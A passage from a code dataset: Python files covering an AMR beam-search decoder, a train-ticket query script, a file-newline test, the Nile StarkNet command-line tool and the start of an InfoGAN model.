jsonify({'reason': 'request OK', 'result': layouts}), 200\n","sub_path":"project/src/api/autograder/seating_layout.py","file_name":"seating_layout.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"192996393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport argparse\nimport os\nimport numpy as np\nfrom oracle.cacheConfiguration import CacheConfiguration\nfrom oracle.cacheTransition import CacheTransition\nfrom postprocessing.amr_format import get_amr\nimport oracle.utils\nimport oracle.ioutil\n\nfrom vocab_utils import Vocab\nimport namespace_utils\nimport soft_NP2P_data_stream\nfrom soft_NP2P_model_graph import ModelGraph\n\nimport re\n\nimport tensorflow as tf\nimport soft_NP2P_trainer\ntf.logging.set_verbosity(tf.logging.ERROR) # DEBUG, INFO, WARN, ERROR, and FATAL\n\ndef search(sess, model, vocab, batch, options, decode_mode='greedy'):\n assert False, 'not in use'\n '''\n for greedy search, multinomial search\n '''\n # Run the encoder to get the encoder hidden states and decoder initial state\n (phrase_representations, initial_state, encoder_features,phrase_idx, phrase_mask) = model.run_encoder(sess, batch, options)\n # phrase_representations: [batch_size, passage_len, encode_dim]\n # initial_state: a tupel of [batch_size, gen_dim]\n # encoder_features: [batch_size, passage_len, attention_vec_size]\n # phrase_idx: [batch_size, passage_len]\n # phrase_mask: [batch_size, passage_len]\n\n word_t = batch.gen_input_words[:,0]\n state_t = initial_state\n context_t = np.zeros([batch.batch_size, model.encode_dim])\n coverage_t = np.zeros((batch.batch_size, phrase_representations.shape[1]))\n generator_output_idx = [] # store phrase index prediction\n text_results = []\n generator_input_idx = [word_t] # store word index\n for i in xrange(options.max_answer_len):\n if decode_mode == \"pointwise\": word_t = batch.gen_input_words[:,i]\n feed_dict = {}\n feed_dict[model.init_decoder_state] = state_t\n feed_dict[model.context_t_1] = context_t\n feed_dict[model.coverage_t_1] = coverage_t\n feed_dict[model.word_t] = word_t\n\n feed_dict[model.phrase_representations] = phrase_representations\n feed_dict[model.encoder_features] = encoder_features\n feed_dict[model.phrase_idx] = phrase_idx\n feed_dict[model.phrase_mask] = phrase_mask\n if options.with_phrase_projection:\n feed_dict[model.max_phrase_size] = batch.max_phrase_size\n if options.add_first_word_prob_for_phrase:\n feed_dict[model.in_passage_words] = batch.sent1_word\n feed_dict[model.phrase_starts] = batch.phrase_starts\n\n\n\n if decode_mode in [\"greedy\",\"pointwise\"]:\n prediction = model.greedy_prediction\n elif decode_mode == \"multinomial\":\n prediction = model.multinomial_prediction\n\n (state_t, context_t, coverage_t, prediction) = sess.run([model.state_t, model.context_t,\n model.coverage_t, prediction], feed_dict)\n # convert prediction to word ids\n generator_output_idx.append(prediction)\n prediction = np.reshape(prediction, [prediction.size, 1])\n [cur_words, cur_word_idx] = batch.map_phrase_idx_to_text(prediction) # [batch_size, 1]\n cur_word_idx = np.array(cur_word_idx)\n cur_word_idx = np.reshape(cur_word_idx, [cur_word_idx.size])\n word_t = cur_word_idx\n cur_words = flatten_words(cur_words)\n text_results.append(cur_words)\n generator_input_idx.append(cur_word_idx)\n\n generator_input_idx = generator_input_idx[:-1] # remove the last word to shift one position to the right\n generator_output_idx = np.stack(generator_output_idx, axis=1) # [batch_size, max_len]\n generator_input_idx = np.stack(generator_input_idx, axis=1) # [batch_size, max_len]\n\n prediction_lengths = [] # [batch_size]\n sentences = [] # [batch_size]\n for i in xrange(batch.batch_size):\n words = []\n for j in xrange(options.max_answer_len):\n cur_phrase = text_results[j][i]\n# cur_phrase = cur_batch_text[j]\n words.append(cur_phrase)\n if cur_phrase == \"\": break# filter out based on end symbol\n prediction_lengths.append(len(words))\n cur_sent = \" \".join(words)\n sentences.append(cur_sent)\n\n return (sentences, prediction_lengths, generator_input_idx, generator_output_idx)\n\ndef flatten_words(cur_words):\n all_words = []\n for i in xrange(len(cur_words)):\n all_words.append(cur_words[i][0])\n return all_words\n\nclass Hypothesis(object):\n def __init__(self, actions, log_ps, state, context_input, context_concept, cache_config=None):\n\n self.actions = actions # store all actions\n self.log_probs = log_ps # store log_probs for each time-step\n\n self.state = state\n self.context_input = context_input\n self.context_concept = context_concept\n\n # TODO xiaochang\n self.trans_state = cache_config\n self.word_focus = 0\n self.concept_focus = 0\n\n self.cache_idx = 0\n\n def addAction(self, action):\n self.actions.append(action)\n\n def actionSeqStr(self, action_vocab):\n return \"#\".join([action_vocab.getWord(action_id) for action_id in self.actions])\n\n def extend(self, system, action_id, log_prob, state, context_input, context_concept, action_vocab):\n action = action_vocab.getWord(action_id)\n if not system.canApply(self.trans_state, action, self.concept_focus, True, self.cache_idx):\n return None\n\n cache_size = self.trans_state.cache_size\n new_config = CacheConfiguration(cache_size, -1,\n self.trans_state) # Initialize from another config\n next_cache_idx = self.cache_idx\n new_focus = self.concept_focus\n if new_config.phase == oracle.utils.FeatureType.SHIFTPOP:\n if action == \"SHIFT\": # Process the next concept.\n assert self.concept_focus == self.trans_state.hypothesis.nextConceptIDX()\n curr_concept = new_config.getConcept(self.concept_focus)\n oracle_action = \"conID:\" + curr_concept\n if new_config.isUnalign(self.concept_focus):\n oracle_action = \"conGen:\" + curr_concept\n next_cache_idx = cache_size - 2\n else:\n assert action == \"POP\"\n oracle_action = action\n system.apply(new_config, oracle_action)\n elif new_config.phase == oracle.utils.FeatureType.PUSHIDX:\n assert action_vocab.getWord(self.actions[-1]) == \"SHIFT\"\n assert next_cache_idx == cache_size - 2\n system.apply(new_config, action)\n elif new_config.phase == oracle.utils.FeatureType.ARCBINARY:\n if action == \"NOARC\": # No arc made to current cache index\n # next_cache_idx += 1\n if next_cache_idx == 0: # Already the last cache index\n next_cache_idx = 0.5\n new_config.phase = oracle.utils.FeatureType.SHIFTPOP\n new_focus += 1\n else:\n next_cache_idx -= 1\n # if next_cache_idx == cache_size - 1: # Have processed all vertices.\n # next_cache_idx = 0\n # new_config.phase = oracle.utils.FeatureType.SHIFTPOP\n # new_focus += 1\n else: # Then process the label\n assert action == \"ARC\"\n new_config.phase = oracle.utils.FeatureType.ARCCONNECT\n else:\n assert new_config.phase == oracle.utils.FeatureType.ARCCONNECT\n oracle_action = \"ARC%d:%s\" % (next_cache_idx, action)\n system.apply(new_config, oracle_action)\n # next_cache_idx += 1\n # if next_cache_idx == cache_size - 1:\n if next_cache_idx == 0:\n next_cache_idx = 0.5\n assert new_config.phase == oracle.utils.FeatureType.SHIFTPOP\n new_focus += 1\n else:\n next_cache_idx -= 1\n\n new_actions = self.actions + [action_id]\n new_probs = self.log_probs + [log_prob]\n new_hyp = Hypothesis(new_actions, new_probs, state, context_input, context_concept, new_config)\n if new_config.phase == oracle.utils.FeatureType.SHIFTPOP:\n new_hyp.word_focus = new_config.nextBufferElem()\n if new_hyp.word_focus == -1: # Either POP or after PUSHIDX.\n new_hyp.word_focus = len(self.trans_state.wordSeq)\n else: # ARC or PUSHIDX\n new_hyp.word_focus = self.word_focus # The word focus does not change during arc or pushidx.\n new_hyp.cache_idx = next_cache_idx\n new_hyp.concept_focus = new_focus\n return new_hyp\n\n def readOffUnalignWords(self):\n concept_align = self.trans_state.conceptAlign\n\n # If all concepts are read, should also move word pointer to the last.\n if self.concept_focus >= len(concept_align):\n self.trans_state.clearBuffer()\n self.word_focus = len(self.trans_state.wordSeq)\n return\n\n length = len(self.trans_state.wordSeq)\n while (self.word_focus not in self.trans_state.widTocid) and self.word_focus < length: # Some words are unaligned.\n popped = self.trans_state.popBuffer()\n assert popped == self.word_focus\n self.word_focus += 1\n\n def extractFeatures(self):\n # At first step, decide whether to shift or pop.\n word_idx, concept_idx = self.word_focus, self.concept_focus\n if (self.trans_state.phase == oracle.utils.FeatureType.ARCBINARY or self.trans_state.phase\n == oracle.utils.FeatureType.ARCCONNECT):\n assert self.actions, \"Empty action sequence start without shift or pop\"\n assert self.cache_idx != -1, \"Cache related operation without cache index.\"\n word_idx, concept_idx = self.trans_state.rightmostCache()\n return self.trans_state.extractFeatures(self.trans_state.phase, word_idx, concept_idx, self.cache_idx)\n\n def isFinal(self):\n return\n\n def latest_action(self):\n return self.actions[-1]\n\n def avg_log_prob(self):\n return np.sum(self.log_probs[1:])/ (len(self.actions)-1)\n\n def probs2string(self):\n out_string = \"\"\n for prob in self.log_probs:\n out_string += \" %.4f\" % prob\n return out_string.strip()\n\n def amr_string(self):\n pass\n # TODO xiaochang, make a string that represents an AMR from self.trans_state\n\n\ndef sort_hyps(hyps):\n return sorted(hyps, key=lambda h: h.avg_log_prob(), reverse=True)\n\n\ndef run_beam_search(sess, trans_system, model, feat_vocab, action_vocab, batch, cache_size, options):\n # Run encoder\n # TODO: this is inconsistent with the paramters returned by run_encoder?\n (initial_state, input_hiddens, input_features, input_mask,\n concept_hiddens, concept_features, concept_mask) = model.run_encoder(sess, batch, options)\n\n sent_stop_id = action_vocab.getIndex('')\n # Initialize this first hypothesis\n context_input_init = np.zeros([model.input_hidden_dim])\n context_concept_init = np.zeros([model.concept_hidden_dim])\n\n # Initialize decode\n sent_anno = batch.instances[0][0]\n concept_seq = sent_anno.concepts\n concept_align = batch.instances[0][2]\n sent_length = sent_anno.length\n concept_num = len(concept_seq)\n concept_categories = sent_anno.categories\n assert len(concept_align) == concept_num, \"%s %s\" % (str(concept_seq), str(concept_align))\n initial_config = CacheConfiguration(cache_size, sent_length)\n\n # all these attributes should be shared by all hypothesis\n initial_config.wordSeq, initial_config.lemSeq, initial_config.posSeq = sent_anno.tok, sent_anno.lemma, sent_anno.pos\n initial_config.conceptSeq, initial_config.conceptAlign = concept_seq, concept_align\n initial_config.categorySeq = concept_categories\n initial_config.tree = sent_anno.tree\n initial_config.buildWordToConcept()\n print (sent_anno.tok)\n print (concept_seq)\n print (concept_categories)\n\n assert sent_anno.tree is not None\n\n start_action_id = batch.action_inp[0][0]\n initial_actionseq = [start_action_id]\n initial_hypo = Hypothesis(initial_actionseq, [0.0], initial_state, context_input_init,\n context_concept_init, initial_config)\n hyps = [initial_hypo]\n\n # beam search decoding\n results = [] # this will contain finished hypotheses (those that have emitted the action)\n steps = 0\n # print (\"maximum action seq length: %d\" % options.max_answer_len)\n # while steps < options.max_answer_len and len(results) < options.beam_size:\n options.max_answer_len = 4000\n while steps < options.max_answer_len and len(results) < options.beam_size:\n cur_size = len(hyps) # current number of hypothesis in the beam\n\n cur_input_hiddens = np.tile(input_hiddens, (cur_size, 1, 1)) # [batch_size, passage_len, enc_hidden_dim]\n cur_input_features = np.tile(input_features, (cur_size, 1, 1)) # [batch_size, passage_len, options.attention_vec_size]\n cur_input_mask = np.tile(input_mask, (cur_size, 1)) # [batch_size, passage_len]\n\n cur_concept_hiddens = np.tile(concept_hiddens, (cur_size, 1, 1))\n cur_concept_features = np.tile(concept_features, (cur_size, 1, 1)) # [batch_size, passage_len, options.attention_vec_size]\n cur_concept_mask = np.tile(concept_mask, (cur_size, 1)) # [batch_size, passage_len]\n\n cur_state_t_1 = [] # [2, gen_steps]\n\n cur_context_input_t_1 = [] # [batch_size, input_hidden_dim]\n cur_context_concept_t_1 = [] # [batch_size, concept_hidden_len]\n cur_action_t = [] # [batch_size]\n\n cur_action_feats = [] # [batch, feat_num]\n feat_reprs = []\n for h in hyps:\n if h.trans_state.phase == oracle.utils.FeatureType.SHIFTPOP:\n h.readOffUnalignWords() # First ignore all unaligned words.\n\n feats = h.extractFeatures()\n feat_reprs.append(\"#\".join(feats))\n # print (\"Features extracted: %s\" % \"#\".join(feats))\n feat_idxs = feat_vocab.to_index_sequence_for_list(feats)\n cur_action_feats.append(feat_idxs)\n\n cur_state_t_1.append(h.state)\n cur_context_input_t_1.append(h.context_input)\n cur_context_concept_t_1.append(h.context_concept)\n cur_action_t.append(h.latest_action())\n\n cur_context_input_t_1 = np.stack(cur_context_input_t_1, axis=0)\n cur_context_concept_t_1 = np.stack(cur_context_concept_t_1, axis=0)\n cur_action_t = np.array(cur_action_t, dtype='int32')\n cur_action_feats = np.array(cur_action_feats, dtype='int32')\n\n cells = [state.c for state in cur_state_t_1]\n hidds = [state.h for state in cur_state_t_1]\n new_c = np.concatenate(cells, axis=0)\n new_h = np.concatenate(hidds, axis=0)\n new_dec_init_state = tf.nn.rnn_cell.LSTMStateTuple(new_c, new_h)\n\n feed_dict = {}\n feed_dict[model.init_decoder_state] = new_dec_init_state\n feed_dict[model.context_input_t_1] = cur_context_input_t_1\n feed_dict[model.context_concept_t_1] = cur_context_concept_t_1\n feed_dict[model.actionidx_t] = cur_action_t\n\n # TODO: extract configuration features and map them to feature indices.\n feed_dict[model.featidx_t] = cur_action_feats\n\n feed_dict[model.input_hiddens] = cur_input_hiddens\n feed_dict[model.input_features] = cur_input_features\n feed_dict[model.input_mask] = cur_input_mask\n\n feed_dict[model.concept_hiddens] = cur_concept_hiddens\n feed_dict[model.concept_features] = cur_concept_features\n feed_dict[model.concept_mask] = cur_concept_mask\n\n (state_t, context_input_t, context_concept_t, topk_log_probs, topk_ids) = sess.run([model.state_t,\n model.context_input_t, model.context_concept_t, model.topk_log_probs, model.topk_ids], feed_dict)\n\n new_states = [tf.nn.rnn_cell.LSTMStateTuple(state_t.c[i:i+1, :], state_t.h[i:i+1, :]) for i in xrange(cur_size)]\n\n\n # Extend each hypothesis and collect them all in all_hyps\n all_hyps = []\n for i in xrange(cur_size):\n h = hyps[i]\n cur_state = new_states[i]\n cur_context_input = context_input_t[i]\n cur_context_concept = context_concept_t[i]\n # TODO xiaochang, do filtering\n for j in xrange(options.topk_size):\n cur_action_id = topk_ids[i, j]\n # cur_action = action_vocab.getWord(cur_action_id)\n cur_action_log_prob = topk_log_probs[i, j]\n\n new_hyp = h.extend(trans_system, cur_action_id, cur_action_log_prob, cur_state,\n cur_context_input, cur_context_concept, action_vocab)\n if new_hyp:\n all_hyps.append(new_hyp)\n\n if len(all_hyps) == 0:\n print (\"No hypothesis found at step %d\" % steps)\n break\n\n # Filter and collect any hypotheses that have produced the end action.\n # hyps will contain hypotheses for the next step\n hyps = []\n for h in sort_hyps(all_hyps):\n # If this hypothesis is sufficiently long, put in results. Otherwise discard.\n if h.latest_action() == sent_stop_id or trans_system.isTerminal(h.trans_state):\n if steps >= options.min_answer_len:\n results.append(h)\n # hasn't reached stop action, so continue to extend this hypothesis\n else:\n hyps.append(h)\n if len(hyps) == options.beam_size or len(results) == options.beam_size:\n break\n\n if len(hyps) == 0:\n break\n\n steps += 1\n # print (\"number of results: %d at step %d\" % (len(results), steps))\n\n # At this point, either we've got beam_size results, or we've reached maximum decoder steps\n # if we don't have any complete results, add all current hypotheses (incomplete summaries) to results\n if len(results)==0:\n results = hyps\n # else:\n # # Print out all the target hypothesis.\n # for (k, h) in enumerate(results):\n # if k == 0:\n # curr_repr = \"result %d, action seq: %s\" % (k, h.actionSeqStr(action_vocab))\n # print (curr_repr)\n # print (h.trans_state.toString())\n\n # Sort hypotheses by average log probability\n hyps_sorted = sort_hyps(results)\n\n # Return the hypothesis with highest average log prob\n return hyps_sorted\n\ndef generateAMR(hypo, sent_anno):\n concept_line_reprs = hypo.trans_state.toConll()\n category_map = sent_anno.map_info\n return get_amr(concept_line_reprs, category_map)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_prefix', type=str, required=True, help='Prefix to the models.')\n parser.add_argument('--in_path', type=str, required=True, help='The path to the test file.')\n parser.add_argument('--out_path', type=str, help='The path to the output file.')\n parser.add_argument('--cache_size', type=int, help='Cache size for the cache transition system.')\n parser.add_argument(\"--decode\", action=\"store_true\", help=\"if to decode new sentences.\")\n parser.add_argument('--mode', type=str,default='pointwise', help='The path to the output file.')\n\n args, unparsed = parser.parse_known_args()\n\n model_prefix = args.model_prefix\n in_path = args.in_path\n out_path = args.out_path\n mode = args.mode\n cache_size = args.cache_size\n use_dep = args.decode\n\n print(\"CUDA_VISIBLE_DEVICES \" + os.environ['CUDA_VISIBLE_DEVICES'])\n\n # load the configuration file\n print('Loading configurations from ' + model_prefix + \".config.json\")\n FLAGS = namespace_utils.load_namespace(model_prefix + \".config.json\")\n FLAGS = soft_NP2P_trainer.enrich_options(FLAGS)\n\n # load vocabs\n print('Loading vocabs.')\n word_vocab = char_vocab = POS_vocab = NER_vocab = None\n word_vocab = Vocab(FLAGS.word_vec_path, fileformat='txt2')\n print('word_vocab: {}'.format(word_vocab.word_vecs.shape))\n if FLAGS.with_char:\n char_vocab = Vocab(model_prefix + \".char_vocab\", fileformat='txt2')\n print('char_vocab: {}'.format(char_vocab.word_vecs.shape))\n if FLAGS.with_POS:\n POS_vocab = Vocab(model_prefix + \".POS_vocab\", fileformat='txt2')\n print('POS_vocab: {}'.format(POS_vocab.word_vecs.shape))\n action_vocab = Vocab(model_prefix + \".action_vocab\", fileformat='txt2')\n print('action_vocab: {}'.format(action_vocab.word_vecs.shape))\n feat_vocab = Vocab(model_prefix + \".feat_vocab\", fileformat='txt2')\n print('feat_vocab: {}'.format(feat_vocab.word_vecs.shape))\n\n print('Loading test set.')\n if use_dep:\n testset = soft_NP2P_data_stream.read_Testset(in_path)\n elif FLAGS.infile_format == 'fof':\n testset = soft_NP2P_data_stream.read_generation_datasets_from_fof(in_path, isLower=FLAGS.isLower)\n else:\n testset = soft_NP2P_data_stream.read_all_GenerationDatasets(in_path, isLower=FLAGS.isLower)\n print('Number of samples: {}'.format(len(testset)))\n\n print('Build DataStream ... ')\n batch_size=1\n if mode in ['beam_search', 'beam_evaluate']: batch_size = 1\n assert batch_size == 1\n\n devDataStream = soft_NP2P_data_stream.DataStream(testset,\n word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab, feat_vocab=feat_vocab, action_vocab=action_vocab,\n options=FLAGS, isShuffle=False, isLoop=False, isSort=True, batch_size=batch_size, decode=True)\n print('Number of instances in testDataStream: {}'.format(devDataStream.get_num_instance()))\n print('Number of batches in testDataStream: {}'.format(devDataStream.get_num_batch()))\n\n best_path = model_prefix + \".best.model\"\n with tf.Graph().as_default():\n initializer = tf.random_uniform_initializer(-0.01, 0.01)\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=False, initializer=initializer):\n valid_graph = ModelGraph(word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab,\n feat_vocab=feat_vocab, action_vocab=action_vocab, options=FLAGS, mode=\"decode\")\n\n ## remove word _embedding\n vars_ = {}\n for var in tf.all_variables():\n if \"word_embedding\" in var.name: continue\n if not var.name.startswith(\"Model\"): continue\n vars_[var.name.split(\":\")[0]] = var\n saver = tf.train.Saver(vars_)\n\n initializer = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(initializer)\n\n saver.restore(sess, best_path) # restore the model\n\n system = CacheTransition(cache_size, oracle.utils.OracleType.CL)\n if use_dep:\n shiftpop, pushidx, arcbinary, arclabel = soft_NP2P_data_stream.load_actions(in_path)\n system.shiftpop_action_set, system.push_action_set = shiftpop, pushidx\n system.arcbinary_action_set, system.arclabel_action_set = arcbinary, arclabel\n income_arc_choices, outgo_arc_choices, default_arc_choices = soft_NP2P_data_stream.load_arc_choices(in_path)\n system.income_arcChoices, system.outgo_arcChoices = income_arc_choices, outgo_arc_choices\n system.default_arcChoices = default_arc_choices\n\n total = 0\n correct = 0\n outfile = open(out_path, 'wt')\n devDataStream.reset()\n for i in range(devDataStream.get_num_batch()):\n # if i < 349:\n # continue\n cur_batch = devDataStream.get_batch(i)\n print('Instance {}'.format(i))\n\n hyps = run_beam_search(sess, system, valid_graph, feat_vocab, action_vocab, cur_batch, cache_size, FLAGS)\n outfile.write(\"# tok:: \" + cur_batch.instances[0][0].tokText.encode('utf-8') + \"\\n\")\n outfile.write(\"# sentence-{}\".format(cur_batch.instances[0][0].idx) + \"\\n\")\n for j in xrange(len(hyps)):\n hyp = hyps[j]\n cur_result = ' '.join([action_vocab.getWord(x) for x in hyp.actions])\n outfile.write(\"# Hyp-{}:: \".format(j) + cur_result + \"\\n\")\n output_amr = generateAMR(hyp, cur_batch.instances[0][0])\n outfile.write(output_amr.to_amr_string().encode('utf-8') + \"\\n\")\n if j == 0:\n curr_repr = \"result %d, action seq: %s\" % (j, hyp.actionSeqStr(action_vocab))\n print (curr_repr)\n # print (hyp.trans_state.toString())\n print (output_amr.to_amr_string().encode('utf-8') + \"\\n\")\n break\n outfile.write(\"\\n\")\n outfile.flush()\n outfile.close()\n\n","sub_path":"soft_beam_decoder.py","file_name":"soft_beam_decoder.py","file_ext":"py","file_size_in_byte":24818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"86444502","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport requests\nfrom prettytable import PrettyTable\n#from docopt import docopt\n\n\"\"\"Train tickets query via command-line.\n Usage:\n tickets [-gdtkz] \n Options:\n -h,--help 显示帮助菜单 \n -g 高铁\n -d 动车\n -t 特快\n -k 普快\n -z 直达\n \n Example:\n tickets beijing shanghai 2016-08-25\n\"\"\"\n\"\"\"\ndef parser():\n arguments = docopt(__doc__)\n print(arguments)\n\"\"\"\n \n\ndef get_data(date,from_station,to_station):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7}\",\n \"Referer\": \"https://kyfw.12306.cn/otn/leftTicket/init\"}\n url = \"https://kyfw.12306.cn/otn/leftTicket/queryT?leftTicketDTO.train_date={0}&leftTicketDTO.from_station={1}&leftTicketDTO.to_station={2}&purpose_codes=ADULT\".format(date,from_station,to_station)\n data = requests.get(url,headers=headers,verify = False)\n data_dict = data.json()\n #print_data(data_dict)\n return data_dict[\"data\"]\n\n\ndef print_data(data_dict):\n print(data_dict[\"data\"][0]) \n #'queryLeftNewDTO' data\n #'buttonTextInfo': '9月2日
8点起售' 备注\n\n # 'station_train_code': 'G101' 车次\n # 'start_station_name': '北京南','to_station_name': '上海虹桥' 出发站 到达站\n # 'start_time': '06:44', 'arrive_time',: '12:38' 出发时间 到达时间\n # 'lishi': '05:54' 历时\n # 'swz_num': '17' 商务座\n # 'zy_num': 一等座\n # 'ze_num': 二等座\n # 'rw_num': '--' 软卧\n # 'yw_num': '--' 硬卧\n # 'gr_num': '--' 高级软卧\n # 'rz_num': 软座\n # 'yz_num': '--' 硬座\n # 'tz_num': '--' 特等座\n # 'wz_num': '有'\n\ndef get_infor(data_list,from_station,to_station,date):\n\n infor_list = ['station_train_code','start_station_name','to_station_name','start_time','arrive_time','lishi','swz_num','tz_num','zy_num',\\\n 'ze_num','rw_num','yw_num','gr_num','rz_num','yz_num','wz_num']\n\n infor_name = [\"车次\",\"出发站\",\"到达站\",\"出发时间\",\"到达时间\",\"历时\",\"商务座\",\"特等座\",\"一等座\",\"二等座\",\"软卧\",\"硬卧\",\"高级软卧\",\"软座\",\"硬座\",\"无座\",\"备注\"]\n\n table = PrettyTable(infor_name)\n\n for train in data_list:\n num_infor = train[\"queryLeftNewDTO\"]\n row = []\n for infor in infor_list:\n if infor in num_infor:\n row.append(num_infor[infor])\n if infor not in num_infor:\n row.append(\"--\")\n row.append(train['buttonTextInfo'])\n table.add_row(row)\n print(\"\\n\\n\\n\") \n print(\"Here is the trains from {} to {} on {}\".format(from_station,to_station,date))\n print(\"you can choose one to buy !\")\n print(\"\") \n print(table) \n\n \n\n\n\ndef get_station_code(name):\n with open(\"station_code.pkl\",\"rb\") as f:\n dataset = pickle.load(f)\n return dataset[name] \n\n\ndef main(from_station,to_station,date):\n data_list = get_data(date,get_station_code(from_station),get_station_code(to_station))\n get_infor(data_list,from_station,to_station,date)\n\n\nif __name__ == '__main__':\n main(\"长春\",\"北京\",\"2016-09-20\")\n \n \n ","sub_path":"train_ticket.py","file_name":"train_ticket.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"613628425","text":"'''\nAuthor: Jim Huang\nDate: 2022-02-16 10:57:54\nLastEditors: Jim Huang\nLastEditTime: 2022-02-16 11:01:03\nDescription: 请填写简介\n'''\nf = open(\"test\",\"w\")\nf.write(\"python\\rwww.python.org\\nwww.magedu.com\\r\\npython3\")\nf.close()\n\nnewlines = [None, \"\",\"\\n\",\"\\r\\n\"]\nfor nl in newlines:\n f = open(\"test\",\"r+\",newline=nl)\n print(f.readlines())\n f.close()","sub_path":"MagePython/Chapter6/6-1-1.py","file_name":"6-1-1.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"624223521","text":"#!/usr/bin/env python\n\"\"\"Nile CLI entry point.\"\"\"\nimport os\nimport shutil\n\nimport click\n\nfrom nile.commands.call import call_or_invoke_command\nfrom nile.commands.compile import compile_command\nfrom nile.commands.deploy import deploy_command\nfrom nile.commands.init import init_command\nfrom nile.commands.install import install_command\nfrom nile.commands.node import node_command\nfrom nile.commands.test import test_command\nfrom nile.commands.version import version_command\nfrom nile.common import BUILD_DIRECTORY, DEPLOYMENTS_FILENAME\n\n\n@click.group()\ndef cli():\n \"\"\"Nile CLI group.\"\"\"\n pass\n\n\n@cli.command()\ndef init():\n \"\"\"Nile CLI group.\"\"\"\n init_command()\n\n\n@cli.command()\ndef install():\n \"\"\"Install Cairo.\"\"\"\n install_command()\n\n\n@cli.command()\n@click.argument(\"artifact\", nargs=1)\n@click.argument(\"arguments\", nargs=-1)\n@click.option(\"--network\", default=\"localhost\")\n@click.option(\"--alias\")\ndef deploy(artifact, arguments, network, alias):\n \"\"\"Deploy StarkNet smart contract.\"\"\"\n deploy_command(artifact, arguments, network, alias)\n\n\n@cli.command()\n@click.argument(\"contract_name\", nargs=1)\n@click.argument(\"method\", nargs=1)\n@click.argument(\"params\", nargs=-1)\n@click.option(\"--network\", default=\"localhost\")\ndef invoke(contract_name, method, params, network):\n \"\"\"Invoke functions of StarkNet smart contracts.\"\"\"\n call_or_invoke_command(contract_name, \"invoke\", method, params, network)\n\n\n@cli.command()\n@click.argument(\"contract_name\", nargs=1)\n@click.argument(\"method\", nargs=1)\n@click.argument(\"params\", nargs=-1)\n@click.option(\"--network\", default=\"localhost\")\ndef call(contract_name, method, params, network):\n \"\"\"Call functions of StarkNet smart contracts.\"\"\"\n call_or_invoke_command(contract_name, \"call\", method, params, network)\n\n\n@cli.command()\n@click.argument(\"contracts\", nargs=-1)\ndef test(contracts):\n \"\"\"\n Run cairo test contracts.\n\n $ nile test\n Compiles all test contracts in CONTRACTS_DIRECTORY\n\n $ nile test contracts/MyContract.test.cairo\n Runs tests in MyContract.test.cairo\n\n $ nile test contracts/foo.test.cairo contracts/bar.test.cairo\n Runs tests in foo.test.cairo and bar.test.cairo\n \"\"\"\n test_command(contracts)\n\n\n@cli.command()\n@click.argument(\"contracts\", nargs=-1)\ndef compile(contracts):\n \"\"\"\n Compile cairo contracts.\n\n $ compile.py\n Compiles all contracts in CONTRACTS_DIRECTORY\n\n $ compile.py contracts/MyContract.cairo\n Compiles MyContract.cairo\n\n $ compile.py contracts/foo.cairo contracts/bar.cairo\n Compiles foo.cairo and bar.cairo\n \"\"\"\n compile_command(contracts)\n\n\n@cli.command()\ndef clean():\n \"\"\"Remove default build directory.\"\"\"\n local_deployments_filename = f\"localhost.{DEPLOYMENTS_FILENAME}\"\n\n if os.path.exists(local_deployments_filename):\n print(f\"🚮 Deleting {local_deployments_filename}\")\n os.remove(local_deployments_filename)\n\n if os.path.exists(BUILD_DIRECTORY):\n print(f\"🚮 Deleting {BUILD_DIRECTORY} directory\")\n shutil.rmtree(BUILD_DIRECTORY)\n\n print(\"✨ Workspace clean, keep going!\")\n\n\n@cli.command()\ndef node():\n \"\"\"Start StarkNet local network.\"\"\"\n node_command()\n\n\n@cli.command()\n@click.version_option()\ndef version():\n \"\"\"Print out toolchain version.\"\"\"\n version_command()\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"src/nile/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"66311694","text":"import tensorflow as tf\nimport numpy as np\nfrom base_model import BaseModel\nfrom utils import get_random_normal \n\nclass INFO_GAN(BaseModel):\n def __init__(self, gpu_id, learning_rate, loss_type, input_dim, z_dim, ae_h_dim_list, dis_h_dim_list):\n super(INFO_GAN, self).__init__(gpu_id, learning_rate, loss_type, input_dim, z_dim) \n\n self.dec_h_dim_list = [*list(reversed(ae_h_dim_list))]\n self.dis_h_dim_list = dis_h_dim_list\n\n self.build_model()\n\n def build_model(self):\n with tf.device('/gpu:%d' % self.gpu_id):\n ### Placeholder ###\n self.X = tf.placeholder(tf.float32, [None, self.input_dim])\n self.y = tf.placeholder(tf.float32, [None, 10])\n self.k = tf.placeholder(tf.int32)\n self.z = tf.placeholder(tf.float32, [None, self.z_dim])\n self.keep_prob = tf.placeholder(tf.float32)\n \n ### Generating ###\n self.gen_X_logit = self.decoder(tf.concat([self.z,self.y], 1), self.dec_h_dim_list, self.input_dim, self.keep_prob, False)\n self.gen_X = tf.nn.sigmoid(self.gen_X_logit)\n self.output = tf.nn.sigmoid(self.gen_X_logit)\n\n ### Discriminating ###\n dis_logit_real = self.discriminator(tf.concat([self.X, self.y], 1), self.dis_h_dim_list, 1, self.keep_prob, False)\n dis_logit_fake = self.discriminator(tf.concat([self.gen_X, self.y], 1), self.dis_h_dim_list, 1, self.keep_prob, True)\n self.dec_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=dis_logit_fake, labels=tf.ones_like(dis_logit_fake))) \n\n self.dis_loss_real = 